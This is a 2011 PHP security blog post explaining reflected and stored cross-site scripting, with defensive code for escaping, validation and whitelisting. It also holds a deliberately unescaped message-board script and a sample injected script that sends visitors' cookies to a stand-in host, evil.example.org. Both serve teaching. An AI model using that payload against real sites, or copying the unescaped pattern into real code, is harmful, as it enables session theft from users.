Saturday, December 10, 2011

Cross-Site Scripting


What Is Cross-Site Scripting (XSS)?

XSS is a special case of code injection. In this type of attack, a malicious user embeds HTML or other client-side script into your Web site. The attack looks like it is coming from your Web site, which the user trusts. This enables the attacker to bypass much of the client’s security, such as the same-origin policy, to gain sensitive information from the user, or to deliver malicious content that the user’s browser runs as if it were part of your site.

There are two types of XSS attacks:
  • Reflected or nonpersistent
  • Stored or persistent

Reflected or nonpersistent XSS

This is the most common type of XSS and the easiest for a malicious attacker to pull off. The attacker uses social engineering techniques to get a user to click on a link to your site. The link has malicious code embedded in it. Your site then redisplays the attack, and the user’s browser parses it as if it were from a trusted site. This method can be used to deliver a virus or malformed cookie (used to hijack sessions later) or grab data from the user’s system. One famous example of this was found in Google’s search results. The malicious code would be tacked onto the end of a search link. When the user clicked on the link, the code would get displayed as part of the search string. The user’s browser would parse this and compromise his or her system.
Defend against this as you would any variable injection attack. Validate the input, and escape any user-generated data before you display it. Do not trust anything that the user’s browser sends you.
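
As a rough illustration of this defense, here is a minimal sketch of a page that redisplays a search term. The helper name escape_html() and the parameter name 'q' are assumptions made for the example, not part of any real site. It relies on PHP's built-in htmlspecialchars(), so the browser shows any markup in the link as plain text instead of parsing it.

```php
<?php

// Hypothetical helper: escape a value for use in HTML text or a quoted attribute.
function escape_html(string $value): string
{
    // ENT_QUOTES converts both double and single quotes in addition to <, > and &.
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// 'q' is an assumed parameter name for the search term.
// Anything that is not a plain string (for example q[]=x) is ignored.
$query = (isset($_GET['q']) && is_string($_GET['q'])) ? $_GET['q'] : '';

// The term is redisplayed only after escaping.
echo 'You searched for: ' . escape_html($query);
```

With this in place, a link carrying a script tag in 'q' would show the tag as text on the results page rather than run it.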

Stored or persistent XSS

This is a less common but far more devastating type of attack. One instance of a stored XSS attack can affect any number of users. This type of attack happens when users are allowed to input data that will get redisplayed, such as on a message board or in a guestbook. Malicious users put HTML or client-side code inside their post. This code is then stored in your application like any other post. Every time that data is accessed, a user has the potential to be compromised. Most of the time the stored code is a link that still requires social engineering to compromise your users, but more sophisticated attackers will launch attacks without the user doing any more than loading your page.

This is all scary stuff, but the defense is the same: If you allow user input, validate it before you store it in your application.

How can this happen?

Consider the following example:
<form>
<input type="text" name="msg"><br />
<input type="submit">
</form>

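<?php

// Deliberately vulnerable: the message is stored and redisplayed without escaping.
if (isset($_GET['msg']))
{
    // Append the raw message, followed by a line break, to the message file.
    $fp = fopen('./test.txt', 'a');
    fwrite($fp, "{$_GET['msg']}<br />");
    fclose($fp);
}

// Output every stored message exactly as it was entered.
readfile('./test.txt');

?>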
This message board appends <br /> to whatever the user enters, appends the result to a file, then displays the current contents of the file.
Imagine if a user enters the following message:
<script>
document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie
</script>
The next user who visits this message board with JavaScript enabled is redirected to evil.example.org, and any cookies associated with the current site are included in the query string of the URL.
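
For comparison, here is a minimal sketch of how the same message board could neutralize that input. The helper name format_message() is an assumption made for the example. It escapes each message with htmlspecialchars() before appending it to the file, so the script above would be shown as text instead of being executed.

```php
<?php

// Hypothetical helper: neutralize HTML in one message before it is stored.
function format_message(string $raw): string
{
    // Escape <, >, &, and both quote styles, then add the line break.
    return htmlspecialchars($raw, ENT_QUOTES, 'UTF-8') . "<br />\n";
}

$file = './test.txt';

if (isset($_GET['msg']) && is_string($_GET['msg']))
{
    // FILE_APPEND adds to the end of the file; LOCK_EX guards against interleaved writes.
    file_put_contents($file, format_message($_GET['msg']), FILE_APPEND | LOCK_EX);
}

// Only display the file once at least one message has been stored.
if (is_file($file))
{
    readfile($file);
}
```

This sketch escapes at write time because the original example displays the file verbatim. Storing the raw message and escaping each time it is displayed would work as well, and it keeps the stored data usable for non-HTML output.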
 

What can you do?

XSS is actually very easy to defend against. Where things get difficult is when you want to allow some HTML or client-side scripts to be provided by external sources (such as other users) and ultimately displayed, but even these situations aren't terribly difficult to handle.

There are two ways you can handle patching your application. One is far easier and more secure but gives the user less flexibility. The other method allows a much wider range of user input but is much harder to implement securely.

The following best practices can mitigate the risk of XSS:
  • Filter all external data.
    Data filtering is the most important practice you can adopt. By validating all external data as it enters and exits your application, you will mitigate a majority of XSS concerns.

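    Example:
    <form method="post">
    <input type="text" name="age"><br />
    <input type="submit">
    </form>
    
    <?php
    
    // The form uses method="post", so the value arrives in $_POST.
    // Note: is_numeric() also accepts values such as "1.5" and "1e3".
    if (isset($_POST['age']) && is_numeric($_POST['age']))
    {
        // your code here
    }
    ?>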
  • Use existing functions.
    Let PHP help with your filtering logic. Functions like htmlentities(), strip_tags(), and utf8_decode() can be useful (note that utf8_decode() is deprecated as of PHP 8.2). Try to avoid reproducing something that a PHP function already does. Not only is the PHP function much faster, but it is also better tested and less likely to contain errors that yield vulnerabilities.
    Example:

    <form>
    <input type="text" name="message"><br />
    <input type="submit">
    </form>
    
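    <?php
    
    if (isset($_GET['message']))
    {
        // ENT_QUOTES also escapes single quotes, which older PHP versions leave alone by default.
        $message = htmlentities($_GET['message'], ENT_QUOTES, 'UTF-8');
        echo $message;
    }
    ?>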
    
  • Use a whitelist approach.
    Assume data is invalid until it can be proven valid. This involves verifying the length and also ensuring that only valid characters are allowed. For example, if the user is supplying a last name, you might begin by only allowing alphabetic characters and spaces.  It is better to deny valid data than to accept malicious data.
    Example:
    <form method="post">
    <input type="text" name="name"><br />
    <input type="submit">
    </form>
    
    <?php
    
    // Accept only 'Dog' and 'Cat'.
    $white_list = array('Dog', 'Cat');
    // The third argument makes in_array() compare strictly, without type juggling.
    if (isset($_POST['name']) && in_array($_POST['name'], $white_list, true))
    {
        echo $_POST['name'];
    }
    ?>
    
  • Use a strict naming convention.
    A naming convention can help developers easily distinguish between filtered and unfiltered data. It is important to make things as easy and clear for developers as possible. A lack of clarity yields confusion, and this breeds vulnerabilities.
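
The whitelist and naming-convention practices above can be combined in a short sketch. Everything named here is an assumption made for illustration: the helper filter_last_name(), the form field 'last_name', the 50-character limit, and the convention of keeping filtered data in $clean and HTML-escaped data in $html.

```php
<?php

// Hypothetical whitelist filter: returns the name if it passes, otherwise null.
function filter_last_name($input): ?string
{
    if (!is_string($input))
    {
        return null;
    }

    // Letters and spaces only, 1 to 50 characters (the limit is an assumed value).
    // \A and \z anchor the whole string, so a trailing newline is rejected too.
    if (preg_match('/\A[A-Za-z ]{1,50}\z/', $input) !== 1)
    {
        return null;
    }

    return $input;
}

$clean = array(); // only data that has passed a filter goes here
$html  = array(); // only data escaped for HTML output goes here

$name = filter_last_name($_POST['last_name'] ?? null);

if ($name !== null)
{
    $clean['last_name'] = $name;
    $html['last_name']  = htmlspecialchars($clean['last_name'], ENT_QUOTES, 'UTF-8');
    echo 'Hello, ' . $html['last_name'];
}
```

With a convention like this, any echo of a variable that does not come from $html stands out in code review. The pattern is deliberately strict and would reject valid names such as O'Brien, which is the trade-off the whitelist approach accepts.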

If you decide to try to filter out malicious code from user input, I suggest looking into the following projects:

Wrapping It Up

Cross-site scripting is a hot buzzword in PHP security circles, but don’t let it intimidate you. It’s really just a new and interesting way of exploiting a variable injection attack. As long as you’re vigilant about sanitizing your variables, you should have no problems with XSS.